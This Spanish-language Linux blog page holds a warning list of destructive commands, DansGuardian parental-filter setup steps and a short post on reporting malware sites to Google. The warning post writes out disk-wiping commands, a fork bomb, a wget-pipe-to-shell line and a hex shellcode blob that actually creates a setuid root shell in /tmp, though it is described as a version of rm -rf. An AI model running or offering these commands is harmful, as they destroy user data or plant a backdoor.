Archivos para seguridad

Comandos a no utilizar

Encontré esta lista de comandos en otro blog en inglés, son comandos que causan gran daño para los que tienen poca experiencia, lastimosamente siempre hay quien los dice por pensar que es graciosos.

Código #1:

sudo rm -rf /

Este comando borra todo lo que está en el directorio raiz, con los consiguientes problemas la próxima vez que arranque el sistema.

Código #2:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión en hexadecimal del anterior.

Código #3:

mkfs.ext3 /dev/sda

Estó borra todos los archivos en el dispositivo mencionado.

Código #4:

:( ){:|:&};:

Esta es una bomba de bifucarción, hace que el sistema ejecuté una gran cantidad de procesos hasta que que congele el sistema y puede provocar que la información se corrompa.

Código #5:

cualquier_comando > /dev/sda

Provoca que se escriba data a un dispositivo de bloque lo que provoca la pérdida total de datos

Código #6:

wget http://alguna_fuente_no_conocida -O- | sh

Esto provoca que se baje de internet un y se ejecute una aplicación con todos los peligros de seguridad que eso conlleva.

Código $7:

mv /home/yourhomedirectory/* /dev/null

Provoca que se muevan todos los archivos y carpetas del directorio del usuario a un lugar que no existe por lo que nunca los podrá recuperar.

Hay muchos más, pero estos son algunos ejemplos que sirven para mantenerse alerta. Lo otro que hay que hacer mención es que en la mayoría de los casos hace falta tener acceso de administrador (root) para hacer esto ya sea usando el comando su o sudo

El artículo original está aquí.

Dejar un comentario

Instrucciones de Dansguardian actualizadas

He estado actualizando mis equipos y tengo un par usando las últimas versiones de Ubuntu y en el camino Dansguardian había dejado de funcionar.

Pero al parecer ya todo está en orden. Los pasos a seguir son

1. Tener el “universe repository”está activado e instalar los siguientes paquetes:
sudo apt-get update
sudo apt-get install dansguardian tinyproxy firehol

Si el clamav da problemas de configuración toca reinstalar el paquete de dansguardian

2. Editar: sudo gedit /etc/dansguardian/dansguardian.conf  (yo prefiero hacerlo desde la línea de comando usando nano)

a) Agregar (#) a:
#UNCONFIGURED

b) Si no hace falta el antivirus:
virusscan=off

c) Revisar que las siguientes líneas tengan estos parámetros:
filterport = 8080
proxyip = 127.0.0.1
proxyport = 3128

d) Salir y guardar.

e) desde la línea de comando:
sudo dpkg-reconfigure dansguardian

3. Editar ahora: sudo gedit /etc/firehol/firehol.conf

Hay que agregar las siguientes líneas:

iptables -t filter -I OUTPUT -d 127.0.0.1 -p tcp –dport 3128 -m owner ! –uid-owner dansguardian -j DROP

transparent_squid 8080 “root root”

interface any world
policy drop
protection strong
client all accept
server cups accept

#server webcache accept
A mi me gusta agregar: server ssh accept porque así puedo dar mantenimiento al sistema remotamente.
Nota: más abajo aparece “interface any world . . .”, toca eliminarlo
Nota: uncomment “server webcache accept” sólo si el dansguardian en este sistema  va a ser el fitro de otros equipos de la red, pero no debe estar conectado directo a  INTERNET o va quedar expuesto a que cualquiera lo manipule

4. Editar: sudo gedit /etc/default/firehol

START_FIREHOL=YES

Esto permite reiniciar la muralla de fuego

5. Editar sudo gedit /etc/tinyproxy/tinyproxy.conf

Cambiar o agregar las siguientes líneas (hay que buscarlas en el documento):
User root
Group root
Port 3128
ViaProxyName “tinyproxy”

6. Reiniciar cada programa:

sudo /etc/init.d/tinyproxy restart
sudo /etc/init.d/firehol restart
sudo /etc/init.d/dansguardian restart
Listo, con eso el sistema queda filtrando esas páginas que los chicos no deben ver por su edad.

Comentarios (2)

Google y el malware

Bonita noticia el hecho que los rankings de Googles están siendo manipulados por terceras personas para lograr que sitios llenos de código peligroso logren estar lo más alto posible.  Suerte que no uso Windows.

Lo bonito es que ahora uno puede informar a Google si encuentra un sitio maligno.  Me imagino que la manera es haciendo click sobre esos links y darse cuenta que son malignos o al leer el resumen en Google aquellos más inteligentes se den cuenta que es un sitio peligroso y lo reporten.  Aunque si eres usuario de Windows es más probable que no reportes nada (porque no sabes nada) o que lo hagas luego que tu PC está lista para borrar el disco duro y empezar de cero.

Bueno si alguien nota algo raro, envíenle el reporte a Google a lo mejor cooperando a lo Open Source se logra algo bueno.

Dejar un comentario

Entradas más antiguas »